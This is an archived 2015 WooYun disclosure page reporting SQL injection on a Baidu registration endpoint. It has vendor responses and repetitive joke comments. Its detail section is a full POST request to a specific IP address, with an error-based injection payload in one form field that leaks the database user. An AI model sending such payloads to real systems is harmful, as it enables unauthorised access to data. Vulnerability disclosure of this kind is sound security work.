当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147848

漏洞标题:百度某站存在SQL注射

相关厂商:百度

漏洞作者: 路人甲

提交时间:2015-10-19 20:38

修复时间:2015-10-20 14:26

公开时间:2015-10-20 14:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

当里个当,当里个当,当里个当当当

详细说明:

106.120.158.40/SystemSet/System-UserRegister.aspx?action=Register&Mode=novalidation 
AddEmployee=%e4%bf%9d%e3%80%80%e5%ad%98&ddlEmployeeCountry=CN&HidDepartmentCode='%2b(select%20convert(int%2cuser)%20FROM%20syscolumns)%2b'&HidMaxPwd=20&HidMinPwd=6&RioEmployeeSex=0&Submit=%e5%85%b3%e3%80%80%e9%97%ad&TxtEmployeeAddr1=2333%20Laguna%20Street&TxtEmployeeAddr2=2233%20Laguna%20Street&TxtEmployeeCode=94200&TxtEmployeeEngName=hyy&TxtEmployeeExternalMail=qsd%40baidu.com&TxtEmployeeIDcard=1&TxtEmployeeJoinDate=01/01/1987&TxtEmployeeMail=qsd%40baidu.com&TxtEmployeeMemo=1&TxtEmployeeMobile=987-65-4329&TxtEmployeeName=hyy&TxtEmployeeTel=1&TxtEmployeeZip=94200&TxtPassword=hyy@123456!&TxtPasswordOk=hyy@123456!&TxtUserCode=hyy&__VIEWSTATE=/wEPDwULLTE5MDgxNTgzODcPZBYCZg9kFiACAg8PFgIeBFRleHQFDOeUqOaIt%2bazqOWGjGRkAgMPDxYCHg9FbmFibGVWaWV3U3RhdGVnZGQCBA88KwAJAgAPFgQeC0V4cGFuZERlcHRoZh4NTmV2ZXJFeHBhbmRlZGRkCBQrAAIFAzA6MBQrAAIWDB8ABQzmiYDmnInpg6jpl6geBVZhbHVlBQEwHgtOYXZpZ2F0ZVVybAUBIx4GVGFyZ2V0BQVfc2VsZh4MU2VsZWN0QWN0aW9uCyouU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5UcmVlTm9kZVNlbGVjdEFjdGlvbgMeCEV4cGFuZGVkZxQrAAUFDzA6MCwwOjEsMDoyLDA6MxQrAAIWDB8ABWcmbmJzcDs8c3BhbiBpZD0nc3Bub2RlXzAwMDAwMScgc3R5bGU9J2N1cnNvcjpwb2ludGVyOycgb25jbGljaz0iU2V0Tm9kZSgnc3Bub2RlXzAwMDAwMScpIj7nmb7luqY8L3NwYW4%2bHwQFBjAwMDAwMR4ISW1hZ2VVcmwFFn4vSW1hZ2VzL2ljby9ub2RlMi5naWYeEFBvcHVsYXRlT25EZW1hbmRnHwUFASMfBgUFX3NlbGZkFCsAAhYMHwAFfCZuYnNwOzxzcGFuIGlkPSdzcG5vZGVfMDAwMDA2JyBzdHlsZT0nY3Vyc29yOnBvaW50ZXI7JyBvbmNsaWNrPSJTZXROb2RlKCdzcG5vZGVfMDAwMDA2JykiPuaXoOe7hOe7h%2bmDqOmXqOivt%2bmAiei/memHjDwvc3Bhbj4fBAUGMDAwMDA2HwkFFn4vSW1hZ2VzL2ljby9ub2RlMi5naWYfCmcfBQUBIx8GBQVfc2VsZmQUKwACFgwfAAVqJm5ic3A7PHNwYW4gaWQ9J3Nwbm9kZV8wMDAwMTUnIHN0eWxlPSdjdXJzb3I6cG9pbnRlcjsnIG9uY2xpY2s9IlNldE5vZGUoJ3Nwbm9kZV8wMDAwMTUnKSI%2b5Luj55CG5omAPC9zcGFuPh8EBQYwMDAwMTUfCQUWfi9JbWFnZXMvaWNvL25vZGUyLmdpZh8KZx8FBQEjHwYFBV9zZWxmZBQrAAIWDB8ABXMmbmJzcDs8c3BhbiBpZD0nc3Bub2RlXzAwMDE2MCcgc3R5bGU9J2N1cnNvcjpwb2ludGVyOycgb25jbGljaz0iU2V0Tm9kZSgnc3Bub2RlXzAwMDE2MCcpIj7lpJbpg6jlkIjkvZzljZXkvY08L3NwYW4%2bHwQFBjAwMDE2MB8JBRZ%2bL0ltYWdlcy9pY28vbm9kZTIuZ2lmHwpnHwUFASMfBgUFX3NlbGZkZAIKDw8WAh8ABQzlt6XkvZzpgq7nrrFkZAIMDxYCHgdWaXNpYmxlZ2QCDQ8WAh4Fc3R5bGUFDmRpc3BsYXk6bm9uZTs7ZAIQDxBkZBYAZAIRDxBkZBYAZAISDxBkZBYAZAITDxBkZBYAZAIYDxAPFgYeDURhdGFUZXh0RmllbGQFC0NvdW50cnlOYW1lHg5EYXRhVmFsdWVGaWVsZAULQ291bnRyeUNvZGUeC18hRGF0YUJvdW5kZ2QQFfgBAAbkuK3lm70G576O5Zu9BuaXpeacrAbpn6nlm70O6Iux5Zu9ICAgICAgICAJUENU55Sz6K%2b3Buasp%2ba0sgnopb/nj63niZkG5Li56bqmBuWfg%2bWPigbnkZ7lo6sM5ZOl5Lym5q%2bU5LqaCeavlOWIqeaXtgblvrflm70P6Zi/5bCU5Y%2bK5Yip5LqaCeWlpeWcsOWIqQzmvrPlpKfliKnkupoJ6Zi/5qC55bu3DOW3tOW3tOWkmuaWrwblt7Topb8M5L%2bd5Yqg5Yip5LqaCeWKoOaLv%2bWkpwnloqjopb/lk6UM6ams5p2l6KW/5LqaCeaEj%2bWkp%2bWIqQzlsLzml6XliKnkupoM5pav6YeM5YWw5Y2hD%2bWNsOW6puWwvOilv%2bS6mgnniLHlsJTlhbAJ5Lul6Imy5YiXBuWNsOW6pgboiqzlhbAG5biM6IWKBuazleWbvQbpppnmuK8M5YWL572X5Zyw5LqaCeWMiOeJmeWIqQbms7Dlm70P5L%2bE572X5pav6IGU6YKmD%2bS4reWbveWPsOa5vuecgQbojbflhbAG5oyq5aiBBuazouWFsAnokaHokITniZkG55Ge5YW4CeaWsOWKoOWdoQnoj7Llvovlrr4M5be05Z%2b65pav5Z2mD%2bWco%2bi1q%2bWLkuaLv%2bWymw/mlq/mtJvmloflsLzkupon5pav55Om5bCU5be054m5576k5bKb77yI5oyq5aiB5bGe5Zyw77yJDOaWr%2ba0m%2bS8kOWFiwzloZ7mi4nliKnmmIIM5Zyj6ams5Yqb6K%2b6DOWhnuWGheWKoOWwlAnntKLpqazph4wJ6IuP6YeM5Y2XGOWco%2bWkmue%2bjuWSjOaZruael%2bilv%2bavlAboi4/ogZQM6JCo5bCU55Om5aSaG%2bWPmeWIqeS6mumYv%2baLieS8r%2bWFseWSjOWbvQzmlq/lqIHlo6vlhbAh54m55YWL5pav576k5bKb5ZKM5Yev56eR5pav576k5bKbBuS5jeW%2blxXms5XlsZ7ljZfljYrnkIPpooblnLAG5aSa5ZOlEuW4leWKs%2b%2b8iOe%2bpOWym%2b%2b8iQnlt7Tmi4nlnK0J5Y2h5aGU5bCUGOeVmeWwvOaxquWym%2b%2b8iOazleWxnu%2b8iQznvZfpqazlsLzkupoP5Zyj55qu5Z%2bD5bCU5bKbD%2bearueJueWFi%2baBqeWymwzms6LlpJrpu47lkIQJ5bC85rOK5bCUBueRmemygQnkuK3nq4vljLoG57q95Z%2bDCeaWsOilv%2bWFsBjpnZ7mtLLnn6Xor4bkuqfmnYPnu4Tnu4cG6Zi/5pu8CeW3tOaLv%2bmprAbnp5jpsoEV5rOV5bGe54675Yip5bC86KW/5LqaFeW3tOW4g%2bS6muaWsOWHoOWGheS6mhvlnabmoZHlsLzkuprogZTlkIjlhbHlkozlm70J5LmM5YWL5YWwCeS5jOW5sui%2bvgnljaLml7rovr4P5rKZ54m56Zi/5ouJ5LyvD%2baJgOe9l%2bmXqOe%2bpOWymwnloZ7oiIzlsJQG6IuP5Li5D%2bWhlOWQieWFi%2baWr%2bWdpg/miZjlhYvlirPnvqTlspsP5Zyf5bqT5pu85pav5Z2mCeeqgeWwvOaWrwbmsaTliqAJ5Lic5bid5rG2CeWcn%2biAs%2bWFthjnibnnq4vlsLzovr7lkozlpJrlt7Tlk6UJ5Zu%2b55Om5Y2iCeiQqOaRqeS6mgbkuZ/pl6gM5Y2X5pav5ouJ5aSrBuWNl%2bmdngnotZ7mr5TkupoJ5omO5LyK5bCUDOa0peW3tOW4g%2bmfpgbplKHph5EJ5LmM5ouJ5ZytEuS5jOWFueWIq%2bWFi%2baWr%2bWdpgnmorXlnLDlhoge5Zyj5paH5qOu54m55ZKM5qC85p6X57qz5LiB5pavDOWnlOWGheeRnuaLiRXoi7HlsZ7nu7TlsJTkuqznvqTlspsG6LaK5Y2XDOeTpuWKqumYv%2bWbvjfmsoPliKnmlq/nvqTlspvvvIjms5XlsZ7mtbflpJbpooblnLAs5Zyo5Y2X5aSq5bmz5rSL77yJK%2bS4lueVjOefpeivhuS6p%2badg%2be7hOe7h%2bWbvemZheWxgO%2b8iFdJUE/vvIkG5rW35ZywDOa0qumDveaLieaWrwbliqDok6wh5Y2X5LmU5rK75Lqa5ZKM5Y2X5LiJ57u05rK7576k5bKbDOWNseWcsOmprOaLiQblhbPlspsP5Yeg5YaF5Lqa5q%2bU57uNCeWcreS6mumCowbmlpDmtY4q56aP5YWL5YWw576k5bKb77yI6ams5bCU57u057qz5pav576k5bKb77yJEuWvhuWFi%2be9l%2bWwvOilv%2bS6mgzms5XnvZfnvqTlspsV6Iux5bGe5Y2w5bqm5rSL6aKG5ZywCeS8iuaLieWFixvkvIrmnJfvvIzkvIrmlq/lhbDlhbHlkozlm70G5Yaw5bKbCeiCr%2bWwvOS6mhLlkInlsJTlkInmlq/mlq/lnaYJ5p%2bs5Z%2bU5aGeDOWfuumHjOW3tOaWrwnnp5HmkannvZcV5Zyj5Z%2b66Iyo5ZKM5bC857u05pavBuacnemynAzliKnmr5Tph4zkupoJ6I6x57Si5omYCeeri%2bmZtuWumwnljaLmo67loKEM5ouJ6ISx57u05LqaCeWIqeavlOS6mgnmkanmtJvlk6UJ5pGp57qz5ZOlFeaRqeWwlOWkmueTpuWFseWSjOWbvQ/pqazovr7liqDmlq/liqAP6ams57uN5bCU576k5bKbIeWJjeWNl%2baWr%2baLieWkq%2bmprOWFtumhv%2bWFseWSjOWbvQbpqazph4wG57yF55S4BuiSmeWPpAbmvrPpl6gV5YyX6ams6YeM5Lqa57qz576k5bKbG%2bmprOaPkOWwvOWFi%2bWym%2b%2b8iOazleWxnu%2b8iQ/mr5vph4zloZTlsLzkupoS6JKZ54m55aGe5ouJ54m55bKbCemprOiAs%2bS7lgzmr5vph4zmsYLmlq8M6ams5bCU5Luj5aSrCemprOaLiee7tAzlsLzliqDmi4nnk5wJ54mZ5Lmw5YqgBue6puaXpgzojqvmoZHmr5TlhYsM57qz57Gz5q%2bU5LqaEuaWsOWWgOmHjOWkmuWwvOS6mgnlsLzml6XlsJQM6K%2b656aP5YWL5bKbCeenkeWogeeJuQzlvIDmm7znvqTlspsP5ZOI6JCo5YWL5pav5Z2mG%2biAgeaMneS6uuawkeawkeS4u%2bWFseWSjOWbvQnpu47lt7Tlq6kP5Zyj5Y2i6KW/5Lqa5bKbD%2bWIl%2baUr%2baVpuWjq%2beZuw/np5Hnp5Hmlq/nvqTlspsV5Yia5p6c5rCR5Li75YWx5ZKM5Zu9D%2bS4remdnuWFseWSjOWbvQbliJrmnpwG5be05p6XCeW4g%2bmahui/qgbotJ3lroEJ55m%2b5oWV5aSnBuaWh%2biOsQznjrvliKnnu7TkupoJ5be05ZOI6amsBuS4jeS4uQnluIPpn6blspsM5Y2a6Iyo55Om6YKjNuavlOOAgeiNt%2bOAgeWNoue7j%2ba1juiBlOebn%2bWVhuagh%2bWxgOWPiuWkluinguiuvuiuoeWxgAznmb3kv4TnvZfmlq8J5Lyv5Yip5YW5CeWtn%2bWKoOaLiQzkuJzokKjmkankupoV6Zi/6bKB5be05bKb77yI6I2377yJDOmYv%2bWhnuaLnOeWhirms6Lmlq/lsLzkuprlkozpu5HloZ7lk6Xnu7TpgqPvvIjms6Lpu5HvvIkJ5a6J6YGT5bCUGOmYv%2baLieS8r%2biBlOWQiOmFi%2bmVv%2bWbvQnpmL/lr4zmsZcV5a6J5o%2bQ55Oc5ZKM5be05biD6L6%2bDOWuieWcreaLieWymw/pmL/lsJTlt7TlsLzkupoM5Lqa576O5bC85LqaGOiNt%2bWxnuWuieeahOWIl%2baWr%2be%2bpOWymwnlronlk6Xmi4kp6Z2e5rSy5Zyw5Yy65bel5Lia5Lqn5p2D57uE57uH77yIQVJJUE/vvIkJ5Y2X5p6B5rSyHOasp%2bS6muS4k%2bWIqee7hOe7h%2b%2b8iEVBUE/vvIkM5Y6E55Oc5aSa5bCUDOeIseaymeWwvOS6mgnlkInluIPmj5AP5biD5Z%2b657qz5rOV57SiD%2bWTpeaWr%2bi%2bvum7juWKoAblj6Tlt7QJ5L2b5b6X6KeSFeWco%2bivnuWym%2b%2b8iOiLseWxnu%2b8iQzloZ7mtabot6/mlq8P5o235YWL5YWx5ZKM5Zu9GuenkeeJuei/queTpijosaHniZnmtbflsrgpDOW6k%2bWFi%2be%2bpOWymwbmmbrliKkJ5ZaA6bqm6ZqGDOilv%2baSkuWTiOaLiR/lhoXpg6jluILlnLrljY/osIPlsYDvvIhPSElN77yJGOWkmuexs%2bWwvOWKoCAgICAgICAgICAgIBXlpJrnsbPlsLzliqDlhbHlkozlm70P5Z%2bD5aGe5L%2bE5q%2bU5LqaD%2bWOhOeri%2beJuemHjOS6mjzmtbfmub7lnLDljLrpmL/mi4nkvK/lm73lrrblkIjkvZzlp5TlkZjkvJrkuJPliKnlsYDvvIhHQ0PvvIkM5qC85p6X57qz6L6%2bDOagvOmygeWQieS6mhEo5rOV5bGeKeWcreS6mumCowbliqDnurMM55u05biD572X6ZmACeagvOmZteWFsAnlhojmr5TkupoJ5Yeg5YaF5LqaG%2beTnOW%2bt%2be9l%2baZruWym%2b%2b8iOazleWxnu%2b8iQ/otaTpgZPlh6DlhoXkupoV%2bAEAAkNOAlVTAkpQAktSAkdCAldPAkVQAkVTAkRLAkVHAkNIAkNPAkJFAkRFAkRaAkFUAkFVAkFSAkJCAkJSAkJHAkNBAk1YAk1ZAklUAk5HAkxLAklEAklFAklMAklOAkZJAkdSAkZSAkhLAkhSAkhVAlRIAlJVAlRXAk5MAk5PAlBMAlBUAlNFAlNHAlBIAlBLAlNIAlNJAlNKAlNLAlNMAlNNAlNOAlNPAlNSAlNUAlNVAlNWAlNZAlNaAlRDAlREAlRGAlRHAlBXAlBZAlFBAlJFAlJPAlBNAlBOAlBSAk5QAk5SAk5UAk5VAk5aAk9BAk9NAlBBAlBFAlBGAlBHAlRaAlVBAlVHAlJXAlNBAlNCAlNDAlNEAlRKAlRLAlRNAlROAlRPAlRQAlRSAlRUAlRWAldTAllFAllVAlpBAlpNAlpSAlpXBumUoemHkQJVWQJVWgJWQQJWQwJWRQJWRwJWTgJWVQJXRgJJQgJIVAJITgJHQQJHUwJHVAJHVQJHVwJHWQJGSgJGSwJGTQJGTwJJTwJJUQJJUgJJUwJLRQJLRwJLSAJLSQJLTQJLTgJLUAJMUgJMUwJMVAJMVQJMVgJMWQJNQQJNQwJNRAJNRwJNSAJNSwJNTAJNTQJNTgJNTwJNUAJNUQJNUgJNUwJNVAJNVQJNVgJNVwJOSQJKTQJKTwJNWgJOQQJOQwJORQJORgJLVwJLWQJLWgJMQQJMQgJMQwJMSQJDQwJDRAJDRgJDRwJCSAJCSQJCSgJCTQJCTgJCTwJCUwJCVAJCVgJCVwJCWAJCWQJCWgJCRAJBUwJBVwJBWgJCQQJBRAJBRQJBRgJBRwJBSQJBTAJBTQJBTgJBTwJBUAJBUQJFQQJFQwJFRQJESgJCRgJDUgJDVQJDVgJDWAJDWQJDWgJDSQJDSwJDTAJDTQJFSAJFTQJETQJETwJFVAJFUgJHQwJHRAJHRQJHRgJHSAJHSQJHTAJHTQJHTgJHUAJHURQrA/gBZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIZDxBkEBUCA%2beUtwPlpbMVAgExATIUKwMCZ2dkZAIgDxYCHwtnZAIlDxBkEBUCA%2baYrwPlkKYVAgExATAUKwMCZ2cWAQIBZAInDw8WAh8ABQnkv53jgIDlrZhkZAIoDw8WAh8LaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ5EZXBhcnRtZW50VHJlZThpBlQd0BkjCYfFYAzQwa0AAAAA

漏洞证明:

ragecomic.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-20 14:26

厂商回复:

Sorry,此漏洞为已知问题,修复进行中

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-19 21:14 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:15 | ☭)

    隔壁漏洞太热闹了,我来这里躲一躲

  2. 2015-10-19 21:29 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    隔壁漏洞太热闹了,我来这里躲一躲

  3. 2015-10-19 21:38 | sqlfeng ( 普通白帽子 | Rank:167 漏洞数:28 | who?)

    隔壁漏洞太热闹了,我来这里躲一躲

  4. 2015-10-19 22:10 | 泪雨无魂 ( 普通白帽子 | Rank:104 漏洞数:41 )

    隔壁漏洞太热闹了,我来这里躲一躲

  5. 2015-10-19 22:52 | 灰帽子 ( 实习白帽子 | Rank:67 漏洞数:12 | 找个女朋友)

    隔壁漏洞太热闹了,我来这里躲一躲

  6. 2015-10-19 23:22 | 秦风 ( 实习白帽子 | Rank:34 漏洞数:10 | 血染江山的画 怎敌妳眉间一点朱砂 覆...)

    隔壁漏洞太热闹了,我来这里躲一躲

  7. 2015-10-19 23:33 | huoji ( 实习白帽子 | Rank:41 漏洞数:9 | 目标是当个农民)

    同楼上

  8. 2015-10-20 00:07 | Azazel ( 路人 | Rank:6 漏洞数:2 | 长路漫漫.....)

    隔壁漏洞太热闹了,我来这里躲一躲6#

  9. 2015-10-20 00:08 | 心云 ( 路人 | Rank:27 漏洞数:14 | 遇见)

    隔壁漏洞太热闹了,我来这里躲一躲

  10. 2015-10-20 01:36 | 萝董 ( 实习白帽子 | Rank:31 漏洞数:4 | 你们好,我是萝董~QQ:1104360187 ,光交各...)

    隔壁漏洞太热闹了,我来这里躲一躲